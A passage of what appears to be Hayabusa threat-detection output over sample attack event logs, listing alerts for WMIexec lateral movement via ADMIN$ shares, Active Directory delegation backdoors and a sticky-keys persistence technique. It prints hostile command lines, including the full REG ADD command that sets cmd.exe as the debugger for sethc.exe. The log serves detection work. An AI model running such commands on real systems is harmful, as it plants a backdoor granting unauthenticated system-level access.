__1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.342 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.344 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.348 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.350 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.354 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.356 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.360 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.363 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.367 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.369 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.373 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.375 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.379 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.381 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.385 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.385 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.388 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.391 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.392 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.392 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.394 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.399 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.406 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.409 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.418 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.420 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.435 +00:00,srvdefender01.offsec.lan,4688,high,,Hermetic Wiper TG Process Patterns,,rules/sigma/process_creation_builtin/proc_creation_win_mal_hermetic_wiper_activity.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.435 +00:00,srvdefender01.offsec.lan,4688,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_builtin/proc_creation_win_wmiprvse_spawning_process.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.435 +00:00,srvdefender01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.435 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x1b98 | User: SRVDEFENDER01$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.440 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.450 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.452 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.456 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.458 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.462 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.463 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.463 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.464 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.479 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.481 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:26:03.004 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:26:03.004 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:26:03.020 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 09:07:00.330 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.330 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.331 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.331 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.331 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.331 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.332 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:07:00.332 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 09:08:00.382 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 09:08:00.383 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 09:08:00.383 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 09:08:00.383 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 09:08:00.383 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 09:08:00.384 +00:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 09:16:14.118 +00:00,srvdefender01.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | CreateKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 09:16:14.119 +00:00,srvdefender01.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 09:16:14.119 +00:00,srvdefender01.offsec.lan,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 09:16:14.119 +00:00,srvdefender01.offsec.lan,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 09:17:14.111 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /t REG_SZ /v Debugger /d ""C:\windows\system32\cmd.exe"" /f | Path: C:\Windows\System32\reg.exe | PID: 0x1b30 | User: admmig | LID: 0x2b5f6bf",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 09:17:14.111 +00:00,srvdefender01.offsec.lan,4688,high,Persis | PrivEsc,Suspicious Debugger Registration Cmdline,,rules/sigma/process_creation_builtin/proc_creation_win_install_reg_debugger_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 09:17:37.439 